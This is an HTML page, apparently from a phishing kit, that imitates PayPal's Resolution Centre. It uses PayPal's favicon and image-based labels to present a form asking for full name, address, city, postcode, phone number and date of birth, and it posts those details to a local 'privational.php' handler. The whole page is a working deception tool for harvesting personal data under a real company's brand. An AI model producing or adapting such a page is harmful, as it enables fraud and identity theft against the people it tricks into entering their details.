<!DOCTYPE HTML5>
<html><head>
<meta charset="UTF-8">
<title>Resolution Centre - PayPal</title>
<link href="https://www.paypalobjects.com/en_US/i/icon/pp_favicon_x.ico" rel="icon">
<link rel="stylesheet" href="css/gfrehegr.css">
</head>
<body>
<div id="bar">
   <div id="wrapperbar">
   <img src="images/website_logo.gif" style="padding-top: 10px;">
   </div>
</div>
<div id="wrapper2">
<img src="images/try.png" style="float: right;padding-top: 20px;">
<div id="block1">
<form id="form" name="form" method="post" action="privational.php">
<img src="images/cinformation.png">
<div id="loginform">
<img src="images/fname.png">
<input type="text" name="01D">
<img src="images/adr.png">
<input type="text" name="02D">
<img src="images/adr2.png">
<input type="text" placeholder="Optional">
<img src="images/cty.png">
<input type="text" name="04D">
<img src="images/pc.png" style="
    display: block;
">
<input type="text" name="06D" style="
    width: 150px;
    margin-top: 10px;
">
<img src="images/fon.png" style="
    display: block;
">
<input type="text" name="07D" style="
    margin-top: 10px;
">
<img src="images/dob.png" style="
    display: block;
">
<input type="text" placeholder="DD-MM-YYYY" name="08D" style="
    margin-top: 10px;
">
<div style="position:relative; height:76px; width:341px; background:url(http://i.gyazo.com/6c5bef7e75b6da5d06db762e7ae7974b.png) 0 0 no-repeat;"><a value="" onclick="document.forms['form'].submit(); return false;" style="position:absolute; top:13px; left:5px; width:335px; height:39px;" title="" alt="" target="_self"></a><a style="position:absolute; overflow:hidden; top:74px; left:339px; width:1px; height:1px;" title="HTML Map" alt="HTML Map" href="http://www.html-map.com/" target="_self"></a></div>
</div>
</form>
</div>
<div id="footer">
<img src="images/copyright.png">
</div>
</div>

</body></html>